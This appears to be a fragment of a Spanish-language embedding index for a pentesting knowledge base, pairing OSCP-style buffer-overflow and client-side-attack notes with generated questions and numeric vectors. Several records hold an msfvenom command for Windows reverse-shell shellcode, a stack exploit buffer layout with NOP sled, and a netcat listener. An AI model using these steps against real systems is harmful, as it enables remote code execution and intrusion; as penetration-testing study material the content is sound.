-0.07111, -0.07068, 0.00107, -0.03682, 0.02844, 0.02029, -0.06885, 0.01143, -0.03075, 0.02257, 0.04925, -0.02751, -0.08597, 0.01866, 0.06017, 0.06347, -0.01179, -0.06088, 0.00483, 0.02388, -0.08611, 0.00727, 0.08216, -0.0245, 0.00965, -0.06622, -0.04787, -0.15249, 0.01288, 0.0074, -0.04541, 0.01236, -0.03485, -0.02321, -0.09626, -0.0288, 0.07745, 0.05545, 0.04684, -0.06779, 0.00269, 0.05997, -0.03888, -0.00339, 0.00389, -0.12257, -0.02231, 0.05936, -0.04628, 0.06107, -0.01089, 0.01284, -0.03165, 0.00672, -0.01453, 0.03342, 0.01508, -0.03184, 0.03164, -0.024, 0.0848, -0.00854, -0.04934, 0.08688, -0.00973, -0.02632, 0.02778, 0.06393, -0.02686, 0.03266, 0.01621, 0.00498, -0.03424, 0.0198, 0.04982, -0.03142, -0.0099, -0.05752, 0.00077, 0.00513, 0.01844, -0.02264, 0.02131, -0.04763, 0.00301, 0.02566, -0.01706, -0.06775, -0.02294, -0.04555, -0.05076, 0.08806, -0.06795, -0.02503, -0.00383, 0.03535, 0.0045, -0.01859, -0.00102, 0.00287, -0.05725, 0.00644, 0.01314, 0.0247, -0.03953, -0.03583, -0.00404, -0.06487, -0.0688, 0.00392, 0.05632, 0.00256, -0.02878, -0.03885, -0.01007, -0.03274, 0.03014, 0.03001, -0.06208, -0.02408, 0.05757, 0.06661, -0.03787, 0.00802, -0.01552]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "que programa me sirve para generar cΓ³digo de shell en Windows?", "v": [-0.03234, -0.0429, -0.05801, -0.14826, -0.05126, -0.21567, -0.07033, -0.04661, 0.03634, -0.16341, -0.05187, -0.09987, -0.00784, -0.21984, -0.01978, -0.00471, 0.03807, -0.15579, 0.06198, 0.06397, 0.00027, -0.00121, -0.02299, -0.09496, -0.06793, 0.04144, 0.01113, -0.00455, -0.06605, -0.01674, 0.03767, -0.11026, 0.04128, -0.10346, -0.07284, 0.09226, 0.04752, 0.06879, -0.01009, 0.11748, -0.00595, 0.0849, -0.06504, 0.10263, 0.1097, -0.02157, 0.13671, -0.01387, 0.03803, 0.0103, -0.07143, -0.02519, -0.05365, 0.02917, 0.11011, -0.03452, 0.02757, -0.14556, -0.08073, 0.04942, -0.02319, 0.00754, 0.02625, -0.04991, 0.01048, 0.0184, 0.10284, 0.01745, -0.04002, 0.08402, -0.07101, 0.04007, 0.04124, -0.06774, 0.01444, 0.06115, -0.08085, -0.08737, 0.06682, 0.0166, 0.01731, 0.0362, 0.01268, 0.00253, -0.00848, -0.08142, 0.00772, -0.04877, 0.01302, -0.11509, 0.08507, -0.0283, -0.01958, 0.15551, 0.07061, -0.04934, 0.05263, 0.03488, 0.04527, 0.11148, 0.02338, -0.165, -0.03117, 0.08661, 0.06941, 0.12725, 0.05709, -0.04589, -0.03933, 0.09545, -0.00589, -0.02837, -0.09903, -0.01199, -0.10176, -0.0113, -0.00789, -0.07124, 0.05433, -0.02605, -0.09891, 0.05766, -0.12529, 0.07863, 0.0037, 0.02979, -0.03675, 0.13203, -0.07859, 0.02732, -0.00556, 0.01591, -0.00837, 0.02503, -0.06015, 0.00557, 0.07114, 0.02362, 0.04847, -0.02575, 0.06916, 0.0964, 0.05383, 0.11927, -0.0443, 0.04148, 0.04632, -0.01821, -0.04537, -0.03439, 0.0303, -0.00619, -0.06996, 0.00439, -0.12573, -0.00701, 0.02092, 0.09417, -0.00297, -0.01542, -0.0579, -0.00127, -0.06004, -0.05729, 0.04014, -0.02982, -0.0274, 0.04518, 0.07858, 0.04259, -0.0044, 0.05343, 0.09749, -0.08531, 0.02157, 0.02004, 0.01681, -0.05255, -0.06552, -0.01946, -0.08339, 0.07298, 0.10435, -0.03037, -0.03645, 0.00323, -0.03667, 0.08419, -0.03654, -0.01891, -0.02435, 0.00093, 0.03218, -0.03361, -0.04026, 0.00885, 0.0059, -0.02707, 0.04839, -0.05503, -0.0388, 0.06647, 0.00233, -0.06314, 0.08059, 0.10734, -0.03873, -0.0105, 0.07991, 0.09098, 0.0026, -0.01082, 0.03441, 0.02514, -0.01498, -0.03233, 0.03014, 0.06206, 0.08384, 0.01451, 0.0006, -0.03431, 0.00958, 0.04305, -0.00678, -0.08467, -0.04313, 0.00801, 0.00335, -0.00815, -0.01196, -0.02903, 0.022, -0.00367, 0.01867, 0.00503, -0.02431, -0.02302, -0.02649, -0.09608, -0.0603, 0.05438, -0.03519, -0.09437, -0.02457, 0.01024, -0.02116, -0.03616, -0.00496, 0.00346, -0.05659, -0.02892, 0.00543, -0.02288, 0.00673, 0.05902]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "con que puedo crear un shell reverse TCP con msfvenom?", "v": [0.08369, -0.1304, -0.07203, 0.07787, -0.07741, -0.07058, -0.14257, 0.1287, 0.02716, 0.03949, -0.10271, 0.15897, 0.1531, -0.07877, 0.04127, 0.14864, -0.03869, -0.12369, 0.0651, 0.05658, 0.12832, -0.1406, -0.068, -0.11691, 0.05276, 0.07955, 0.00919, -0.0244, -0.06644, -0.16886, 0.06655, -0.07922, 0.01179, 0.06498, 0.02101, 0.0408, 0.02575, 0.01292, -0.02241, 0.16419, 0.07502, 0.02701, -0.1063, 0.17366, 0.08665, -0.01164, -0.02609, -0.04782, -0.0383, 0.03925, -0.11546, -0.08744, -0.18021, 0.04743, -0.05415, -0.02082, 0.05666, -0.07659, 0.02862, -0.04851, -0.09723, 0.07454, -0.16326, -0.0927, 0.02629, -0.06231, -0.10952, -0.03835, -0.05277, 0.0482, -0.02961, 0.00985, -0.01589, -0.08624, 0.03932, -0.01158, -0.03233, 0.04718, 0.0426, -0.03516, -0.06876, -0.11321, -0.10052, 0.0023, -0.01154, -0.06237, 0.01948, 0.00302, 0.01368, -0.04376, 0.02217, 0.03899, 0.00252, 0.06545, -0.01025, -0.06826, -0.05362, -0.01819, -0.11197, 0.05385, -0.0269, 0.02532, 0.01376, 0.10669, 0.00785, -0.0324, 0.08673, -0.01165, -0.00276, 0.1163, 0.0186, -0.03129, -0.00258, -0.02775, -0.04024, -0.05245, -0.06784, 0.00585, 0.12445, 0.02864, 0.02396, -0.05091, -0.02434, 0.03918, -0.05758, 0.06613, -0.01494, 0.09401, -0.06652, 0.08941, -0.00267, 0.00352, -0.07601, -0.01054, -0.07153, 0.00239, -0.00639, 0.02984, -0.00692, -0.0133, 0.07741, 0.09893, 0.00232, -0.01152, -0.00647, -0.06886, -0.00408, -0.11626, -0.04451, 0.01218, -0.00645, -0.00289, -0.00393, -0.04908, -0.03089, -0.03078, 0.05527, -0.04329, 0.01773, 0.04718, -0.10044, 0.08565, -0.04667, -0.00585, 0.01916, -0.08499, -0.09295, 0.02525, 0.01653, -0.04978, -0.08448, -0.01737, 0.11958, -0.01646, 0.06067, -0.00459, -0.02892, -0.05091, 0.02479, -0.02439, 0.02163, -0.06303, -0.0563, -0.05912, -0.02478, -0.05744, 0.04894, 0.10768, 0.00445, 0.03437, -0.03436, 0.06127, 0.0257, -0.01044, -0.05432, -0.01189, 0.09648, -0.06974, 0.03404, -0.01411, 0.02479, 0.04103, 0.05698, -0.0863, -0.05352, -0.0333, -0.06029, 0.11296, 0.00267, -0.03484, 0.03722, -0.00904, 0.04907, 0.04431, 0.00644, 0.06697, 0.00214, 0.02367, 0.00993, 0.01685, 0.03669, -0.02499, 0.02403, 0.06366, -0.00897, -0.08366, 0.01955, -0.01943, 0.0394, 0.02217, 0.01465, -0.00754, 0.05561, -0.02478, -0.02067, 0.06122, 0.00584, -0.02803, -0.0154, 0.00642, -0.02205, 0.0548, -0.03051, -0.03379, 0.04962, -0.02422, -0.04759, 0.00487, -0.04144, -0.0169, -0.04309, 0.01522, 0.02587, -0.03872, -0.01394, 0.03225]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "indexar": "cual es una alternativa libre a la generaciΓ³n de shellcode para pentesting?", "v": [0.03841, -0.07123, -0.14643, 0.05512, -0.10405, -0.05914, -0.05988, -0.04672, -0.05554, -0.06216, -0.12174, -0.02088, -0.11264, -0.06386, 0.09153, 0.03808, -0.09905, -0.09884, 0.11462, -0.02363, -0.1866, -0.00047, -0.08426, -0.17869, -0.01741, 0.00549, 0.08302, 0.09801, -0.04302, 0.08834, 0.00067, -0.10989, 0.00371, -0.06508, -0.02881, -0.01154, 0.06506, 0.12712, -0.00187, 0.03836, -0.00084, -0.06812, -0.13381, 0.11521, 0.0164, 0.00711, -0.03256, 0.15136, 0.03299, 0.1097, -0.15508, 0.03647, -0.08164, 0.07068, 0.1586, 0.01611, 0.18868, -0.10549, -0.08174, -0.08346, -0.03162, 0.07293, 0.04288, -0.09036, 0.03042, 0.02524, -0.0061, -0.06427, -0.0859, 0.07446, 0.06967, -0.01217, 0.04075, -0.02084, -0.09354, 0.09334, -0.0639, -0.03705, 0.00872, 0.064, 0.06889, -0.07075, -0.03422, 0.08442, 0.00044, -0.09413, 0.03428, -0.12662, -0.0364, -0.03712, 0.00751, -0.01006, 0.01364, 0.13438, -0.01731, -0.03675, -0.01475, 0.07253, 0.02514, 0.11265, 0.01535, 0.02741, -0.0521, 0.12341, 0.06806, 0.00699, -0.0018, 0.03934, -0.03073, 0.03244, 0.00527, 0.00654, -0.00024, 0.00995, -0.05265, -0.05503, -0.03156, -0.03264, 0.02704, -0.08442, 0.01152, 0.02379, -0.05062, -0.02958, 0.0075, 0.10855, -0.04837, 0.08824, -0.09678, 0.02441, 0.06469, -0.07671, -0.01368, -0.07715, -0.07654, -0.02906, 0.03644, -0.02093, -0.01181, 0.00428, 0.02715, 0.07619, -0.02711, 0.00646, -0.00804, -0.03605, 0.00931, -0.07628, -0.00699, -0.03493, -0.10563, 0.00195, -0.09276, 0.0941, -0.04642, 0.047, -0.0557, 0.00269, -0.01594, 0.04779, 0.0014, -0.08762, -0.025, -0.00691, -0.01379, 0.00315, -0.02352, 0.02323, -0.00015, 0.00553, 0.03342, 0.02041, 0.05882, -0.06296, 0.06353, -0.03952, -0.03913, -0.04061, 0.01809, -0.01831, -0.0278, 0.03757, -0.16636, -0.11146, -0.02285, -0.04921, 0.05421, -0.02012, 0.03022, 0.02382, 0.06633, 0.01562, -0.04336, -0.04969, -0.05935, 0.00311, 0.05404, -0.10824, -0.00597, -0.0424, -0.06179, 0.0898, -0.01229, -0.0816, -0.00502, 0.03069, -0.0895, -0.0131, 0.03785, 0.00932, 0.04653, -0.02075, 0.0989, 0.05717, -0.0506, 0.02407, 0.01712, -0.04563, 0.05973, 0.05538, -0.00601, 0.02978, 0.02987, 0.02524, -0.03048, -0.00281, 0.01956, 0.04338, -0.00223, 0.00694, 0.0144, 0.01193, -0.01898, 0.01953, 0.05295, 0.03971, 0.03602, 0.01461, -0.02515, -0.08264, 0.06913, 0.02549, -0.0537, 0.00115, -0.04136, 0.00615, -0.12578, -0.01318, -0.0359, -0.05752, -0.03421, 0.01749, -0.03472, -0.01014, 0.01055, -0.00221]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "que programa sirve para conectar de forma inversa a un servidor", "v": [0.05781, 0.05751, -0.23594, -0.14543, 0.04105, -0.13329, -0.00638, -0.12762, 0.03341, -0.089, -0.09708, -0.11742, 0.05749, -0.0592, 0.02002, 0.09972, 0.18318, -0.14704, 0.05001, 0.01795, 0.00961, 0.06822, 0.05554, -0.08508, -0.08197, 0.07065, 0.03918, -0.03259, -0.0449, -0.06733, -0.01832, -0.10214, 0.08393, 0.00308, 0.00536, -0.07269, -0.0243, 0.12755, 0.00686, 0.09473, 0.05143, 0.04918, -0.04429, 0.04454, 0.01623, -0.00074, 0.12821, -0.07811, 0.07384, 0.0231, -0.15008, -0.03716, -0.1259, -0.05701, -0.05884, -0.04092, -0.03395, -0.22543, -0.01278, -0.05126, -0.09195, 0.0226, -0.09338, -0.05988, 0.09022, -0.02753, -0.04189, -0.04209, -0.07234, -0.07933, -0.06435, 0.03097, -0.01688, -0.0813, 0.03351, 0.06432, 0.0508, -0.02716, 0.06895, 0.00301, -0.01844, -0.00645, -0.04621, 0.06428, -0.07059, 0.00696, 0.02178, -0.00252, 0.0536, 0.00384, 0.04044, 0.10165, -0.04882, 0.0575, 0.03353, -0.06339, 0.09573, -0.01589, 0.01527, 0.02603, 0.12015, 0.01635, -0.02755, 0.13166, -0.0532, 0.08753, 0.11594, -0.06076, 0.00076, 0.06243, 0.03438, -0.02441, 0.01202, -0.02577, -0.01381, -0.0807, 0.01072, 0.01917, 0.03959, 0.06137, -0.10897, -0.00067, 0.02409, 0.06323, 0.05101, 0.0111, -0.00064, 0.0417, 0.02405, 0.08842, -0.0096, 0.01756, -0.01246, -0.03467, -0.06646, -0.04175, 0.11204, -0.07331, -0.07389, -0.05816, 0.06984, 0.08914, -0.01047, -0.02456, 0.05744, -0.03971, 0.14912, -0.09659, -0.06021, 0.04846, -0.00465, 0.04024, -0.10501, 0.0213, -0.09998, -0.04893, -0.02123, -0.07537, -0.0772, 0.08732, -0.00564, 0.02807, 0.0608, 0.00117, 0.03637, -0.03958, -0.05105, 0.04854, 0.13186, 0.07539, -0.0651, 0.05222, 0.03529, -0.01614, -0.04429, 0.01604, -0.06525, -0.04808, 0.06056, 0.00137, -0.08105, 0.01446, 0.00637, -0.05858, -0.05829, 0.01915, -0.0483, 0.01924, 0.02331, 0.00338, 0.00728, -0.00415, -0.06754, 0.0307, 0.00992, -0.05384, -0.04226, -0.00986, 0.05429, -0.00597, -0.02221, -0.04205, 0.01997, 0.01766, -0.00461, 0.07389, -0.04762, 0.03676, 0.04407, 0.08077, -0.0142, -0.05288, 0.09019, 0.04673, -0.02781, -0.03165, 0.03375, -0.0421, 0.01943, 0.06201, -0.02824, -0.0307, -0.04245, 0.02998, 0.02347, -0.07064, 0.0079, 0.00966, 0.0282, 0.00396, -0.03887, -0.00138, -0.01248, -0.00776, 0.00845, -0.02027, -0.02297, -0.07161, -0.01964, -0.10464, 0.03442, 0.09287, 0.01067, -0.07409, 0.01189, -0.0304, -0.04936, -0.01125, -0.01332, -0.01446, -0.03844, 0.01181, 0.03581, -0.02964, 0.03412, -0.00241]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "cual es una alternativa libre a metasploit para lanzar exploits", "v": [-0.0912, -0.04132, -0.15302, -0.09521, -0.07626, 0.04009, -0.10657, 0.00475, -0.25574, -0.01691, -0.03723, -0.11799, 0.00839, 0.10359, 0.08456, -0.04828, 0.02088, -0.01234, 0.07454, -0.15881, -0.13693, -0.01946, -0.15644, -0.17777, 0.00203, 0.06504, 0.00187, 0.02123, -0.07302, 0.07238, -0.16173, 0.06946, -0.05622, -0.02165, 0.10234, -0.01117, 0.10731, 0.07439, 0.15122, -0.02908, 0.0175, -0.05304, -0.1249, 0.02296, 0.15207, -0.13543, -0.03962, 0.0171, 0.0502, 0.00327, 0.03539, -0.06002, -0.11368, 0.03971, 0.01599, -0.02769, 0.08581, -0.10274, -0.15078, 0.00907, -0.06925, -0.01159, 0.07872, -0.02248, -0.00034, -0.07166, -0.04467, 0.02074, -0.11179, 0.14971, 0.14286, 0.02175, 0.07278, 0.03921, -0.08113, 0.00345, 0.02113, -0.05839, -0.01737, 0.05538, -0.03685, -0.11945, -0.07939, 0.10917, -0.05001, -0.10389, 0.08813, 0.0226, 0.04282, 0.00928, 0.01153, -0.00429, -0.06441, -0.01653, -0.02954, -0.08917, 0.03428, 0.09647, -0.01039, 0.09175, -0.00701, 0.01692, -0.10653, 0.03111, -0.00422, 0.01642, -0.09058, 0.07875, -0.12022, -0.02304, 0.0101, -0.00867, 0.02113, 0.05067, 0.06171, -0.03003, -0.0264, -0.00124, -0.01952, 0.00318, -0.15915, -0.04456, -0.0073, -0.02355, 0.01869, 0.06124, 0.0492, -0.03549, 0.00011, -0.04967, 0.10609, 0.05898, 0.01942, 0.03175, -0.08848, -0.0791, 0.11517, -0.07415, -0.00336, -0.00059, 0.00436, 0.03196, 0.01353, 0.02532, -0.01364, -0.02519, 0.00571, 0.00683, 0.04312, -0.07961, -0.05082, -0.00565, -0.05502, 0.05938, -0.03962, -0.0489, -0.07067, 0.0666, 0.01646, 0.05221, 0.07047, -0.00566, -0.03093, -0.00125, -0.00406, -0.02862, 0.05256, -0.02988, -0.04629, 0.04359, 0.0176, 0.05604, 0.13416, -0.02572, 0.10307, -0.12423, 0.01205, -0.0038, 0.01364, 0.00285, -0.0325, 0.01306, 0.01849, -0.0219, 0.0167, -0.07792, 0.06418, -0.04185, 0.03831, -0.02479, 0.02728, -0.00307, 0.03287, -0.0312, 0.01268, -0.00109, 0.00333, -0.02014, -0.01962, -0.01786, -0.00619, -0.07571, -0.0057, -0.0279, 0.02327, -0.00638, -0.02686, 0.01592, -0.04163, 0.0286, 0.02777, 0.06331, 0.04755, 0.01752, -0.10831, 0.01402, 0.00599, 0.03885, 0.0015, -0.01666, 0.01203, 0.01899, 0.00121, -0.02692, -0.0122, 0.06538, -0.03358, -0.01094, -0.03918, -0.00543, 0.01779, -0.0145, 0.01761, 0.06942, -0.02767, -0.0236, 0.02914, 0.03773, 0.02317, -0.03528, 0.01758, 0.0305, 0.02343, -0.00096, 0.00179, 0.03824, -0.03321, -0.01826, -0.01713, -0.0487, -0.00808, -0.00479, -0.00536, 0.01541, 0.0168, 0.017]} +{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit Β· Reverse shell Β· Exploits conocidos Β· OSCP MOC", "indexar": "con que herramienta puedo ejecutar cΓ³digo malicioso desde dentro del sistema", "v": [-0.104, 0.02856, 0.02605, -0.14251, -0.00069, -0.18642, -0.06837, 0.04029, -0.1205, -0.12295, -0.20691, -0.10788, 0.0578, -0.10259, 0.05564, 0.0311, 0.11592, -0.10318, -0.0032, -0.07779, -0.00518, -0.10579, -0.04672, -0.08291, -0.05007, 0.05825, -0.00362, -0.02246, -0.25591, -0.0435, -0.01839, 0.00751, 0.09557, -0.09699, -0.09829, 0.03272, 0.03785, 0.09492, -0.04086, 0.08922, -0.03583, 0.06549, -0.06503, 0.02783, 0.03618, -0.00071, 0.03499, 0.04401, 0.03766, -0.01429, -0.07586, -0.11778, -0.1688, -0.03093, 0.06276, -0.12823, 0.1077, -0.10795, -0.01269, -0.10285, -0.02271, -0.01167, -0.029, -0.05731, 0.03542, 0.0179, 0.06155, -0.01853, -0.10266, 0.14521, -0.00418, 0.01782, -0.05742, 0.01655, 0.00654, -0.00996, -0.0115, -0.01646, 0.00748, 0.05996, 0.01747, -0.02285, -0.13767, 0.01987, -0.00463, -0.0639, -0.00729, -0.05406, 0.05822, -0.08586, 0.07268, -0.04646, 0.03761, 0.09653, 0.06385, 0.04474, 0.02815, 0.00728, 0.00011, -0.04973, 0.13787, -0.11435, -0.07532, 0.06512, 0.11563, 0.02822, 0.05, 0.0391, 0.0038, -0.05226, -0.03935, -0.042, -0.00126, -0.06472, -0.07479, -0.01736, -0.04923, -0.01831, 0.02987, -0.07355, -0.05873, 0.0577, -0.16422, -0.03125, 0.06505, -0.00262, 0.00554, 0.08081, 0.01446, -0.10183, -0.05443, -0.02399, -0.02944, 0.0163, -0.02704, -0.02067, 0.03281, -0.06582, 0.02044, -0.03067, -0.00857, 0.01682, 0.0324, -0.00109, 0.02853, 0.0436, 0.02951, -0.10261, -0.06254, -0.04452, 0.04242, 0.02358, -0.08096, -0.02081, -0.09037, 0.00534, 0.00537, 0.04875, -0.02363, 0.00145, -0.07407, -0.03629, -0.01083, -0.02049, -0.0182, -0.03457, 0.02463, -0.02776, 0.05889, 0.03257, 0.03816, 0.02806, 0.13432, -0.01817, 0.04582, -0.08249, -0.0654, -0.05282, 0.01004, -0.07405, -0.02289, 0.03882, 0.04674, -0.05733, 0.00355, -0.00217, 0.01557, 0.05654, -0.00388, 0.01627, 0.02352, 0.04498, 0.02868, 0.00425, 0.00242, 0.02307, 0.00484, -0.04972, 0.00798, -0.03215, -0.04042, 0.06188, 0.04353, -0.0682, -0.00477, 0.1132, 0.0108, 0.00788, -0.02412, 0.10724, 0.05776, 0.01187, 0.0683, -0.0067, -0.06641, 0.03627, -0.04827, 0.08411, 0.02889, -0.01715, 0.00833, -0.001, 0.09555, -0.01356, -0.01849, -0.04658, -0.05074, 0.08039, -0.00804, -0.01557, -0.00115, -0.05783, 0.01433, -0.0329, 0.02026, -0.05336, -0.01057, -0.05803, -0.03946, -0.05165, 0.0144, 0.09743, 0.02337, -0.0541, -0.0298, -0.02561, -0.02068, -0.1082, -0.02944, -0.08725, 0.01205, 0.01804, 0.0498, -0.06854, -0.00075, -0.03643]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "que tecnica sirve para atacar a un usuario que abre enlaces maliciosos?", "v": [-0.00784, 0.02655, -0.028, -0.12946, 0.05471, -0.0846, -0.06652, -0.09858, -0.07461, -0.00996, -0.02044, -0.1678, -0.04382, 0.01428, 0.14016, -0.04808, 0.06093, -0.0031, 0.20843, -0.04066, 0.07958, -0.03525, -0.03998, -0.08895, -0.07672, -0.14077, 0.03582, -0.12, -0.15684, -0.08352, -0.03458, 0.08447, 0.01586, -0.0342, 0.04532, 0.0061, -0.01574, -0.01576, 0.08741, 0.08687, -0.08487, -0.10411, -0.19928, -0.03747, -0.02227, 0.06282, -0.00135, 0.00314, 0.0463, 0.04946, 0.07357, 0.00749, -0.15801, -0.02318, -0.07223, -0.00234, 0.15341, -0.03505, 0.01139, -0.04827, -0.05515, 0.04345, 0.0747, 0.02392, 0.03156, -0.1174, 0.02091, 0.00993, -0.0594, 0.00046, -0.0768, 0.07406, -0.04882, 0.01236, -0.04238, 0.09032, -0.02861, 0.13202, 0.07876, 0.02311, 0.00231, -0.0644, -0.08443, -0.00873, -0.09074, -0.02981, 0.10075, -0.02242, -0.0114, -0.16312, 0.10757, 0.10891, 0.01424, -0.03075, -0.06927, -0.02629, -0.00028, 0.0033, 0.08291, -0.00828, 0.05858, -0.02917, -0.10316, 0.06184, 0.04036, 0.03461, 0.08274, -0.13485, 0.00892, -0.09629, 0.01328, -0.00388, 0.00045, -0.07495, -0.00063, -0.00303, -0.12089, -0.05861, -0.03376, -0.05385, -0.03088, -0.06473, -0.01111, 0.07776, -0.08927, -0.03033, 0.02217, -0.02236, -0.00236, -0.05301, -0.08921, 0.014, -0.00508, 0.02537, -0.09095, -0.02245, 0.07064, -0.11118, -0.07933, 0.00455, 0.07248, 0.13413, -0.03489, -0.05699, 0.00103, 0.01189, 0.04487, -0.08464, -0.11835, -0.06349, 0.02844, 0.00359, -0.02646, 0.07252, -0.04649, -0.05494, -0.00125, -0.02708, 0.02334, 0.13925, -0.02932, 0.05535, -0.00847, -0.01459, -0.05693, -0.02305, -0.02018, -0.05333, 0.08134, 0.01645, -0.00124, 0.06365, -0.06478, 0.00209, 0.02116, -0.05761, -0.04604, -0.00437, 0.02864, -0.06943, -0.04574, -0.14, -0.01974, 0.05894, -0.07038, -0.0554, 0.02183, 0.01569, 0.03714, 0.01872, -0.00781, -0.01876, -0.01666, 0.05683, 0.01913, -0.07586, -0.04323, -0.02552, 0.01817, -0.01138, 0.01823, -0.03045, -0.01503, 0.0041, 0.01577, 0.07856, -0.00756, -0.04325, -0.07277, 0.04085, 0.04556, -0.0265, 0.07035, -0.03891, -0.09582, -0.0082, 0.02915, 0.00747, 0.0049, 0.03762, 0.01465, 0.03936, 0.03535, -0.02925, 0.02347, 0.0477, -0.02244, -0.04823, 0.02781, 0.01683, -0.0389, -0.03011, -0.03218, -0.0815, -0.01511, -0.02329, 0.02378, 0.01009, -0.03305, -0.01391, 0.02664, 0.06534, -0.01885, -0.07413, 0.0068, -0.07052, -0.06759, -0.02158, 0.00651, -0.11247, 0.01181, 0.01982, 0.03155, -0.02301, 0.07083, -0.04339]} +{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "indexar": "cual es una herramienta para simular ataques de lado del cliente?", "v": [-0.06958, 0.08845, -0.17011, -0.13074, -0.02247, -0.17673, -0.08534, 0.03253, 0.02871, 0.03479, -0.06881, -0.10257, 0.00357, -0.09317, 0.02657, -0.0245, 0.05913, -0.11879, 0.08231, 0.02174, 0.01103, 0.03254, -0.07052, 0.00101, -0.14735, 0.00524, 0.05993, -0.0043, -0.1695, -0.00535, 0.01038, -0.06317, 0.064, -0.10276, -0.01308, -0.11221, -0.04158, 0.06325, 0.05768, 0.11634, 0.06359, -0.02997, -0.12841, -0.05936, 0.11549, -0.00256, -0.03654, -0.06495, 0.04196, 0.01762, -0.05236, -0.06779, -0.18659, -0.04164, 0.02536, -0.16311, 0.17103, -0.20942, 0.14911, -0.11325, -0.03858, 0.03253, 0.01191, -0.01575, 0.04421, -0.07377, 0.04576, -0.03474, -0.04493, 0.04027, -0.03446, 0.0133, -0.00805, -0.00175, 0.01156, -0.06454, 0.02896, 0.0845, 0.05916, -0.03021, 0.03372, -0.03208, -0.13024, 0.01242, -0.10765, -0.03977, 0.09495, 0.03309, 0.00058, -0.05387, -0.00227, 0.03006, -0.0193, 0.02508, -0.01918, -0.06609, 0.09932, -0.12935, -0.03026, -0.06448, 0.08445, -0.04196, -0.13424, 0.06057, -0.02152, 0.03423, -0.04411, -0.03354, -0.06626, -0.05513, -0.01066, -0.00792, -0.04115, 0.01931, 0.0419, -0.02299, -0.01505, -0.07776, 0.09951, -0.08754, 0.00946, 0.05618, -0.05718, 0.02497, -0.05949, 0.05858, -0.04952, 0.03188, -0.06277, -0.11106, -0.00213, -0.00406, -0.0476, 0.03844, 0.01066, -0.03156, 0.03959, -0.12973, 0.00516, -0.048, 0.02654, 0.09687, -0.02055, -0.11323, 0.04427, 0.04713, 0.03179, -0.00749, -0.07669, 0.03465, 0.02043, 8e-05, 0.01308, 0.05592, -0.10137, -0.03057, -0.04157, -0.02451, -0.03725, 0.084, 0.00278, 0.00709, 0.07565, 0.01394, 0.02508, -0.07718, 0.0039, -0.00065, 0.07898, 0.04704, 0.03104, 0.01856, 0.06536, -0.02539, 0.0291, -0.00153, -0.0872, -0.0512, -0.01735, -0.07285, -0.01582, -0.03848, -0.03323, 0.01163, -0.00564, -0.06557, 0.01278, 0.01079, 0.04754, 0.06142, -0.03054, 0.0084, -0.02166, -0.0367, 0.04174, 0.00884, -0.00647, -0.05247, 0.0181, -0.01358, -0.00175, -0.0648, -0.04283, -0.07197, 0.04558, 0.14088, -0.01454, -0.0056, -0.02392, 0.05384, 0.07042, -0.04721, 0.07469, -0.02087, -0.01273, -0.064, 0.02702, 0.01311, -0.00165, -0.04151, 0.03237, -0.01598, 0.01235, 0.00864, -0.0986, 0.06719, -0.01576, -0.00525, -0.01029, -0.00547, 0.01369, -0.06577, 0.0181, -0.01426, 0.03758, -0.02354, 0.10273, -0.03581, -0.08238, -0.03469, 0.00965, 0.05387, 0.01407, -0.06382, -0.02104, 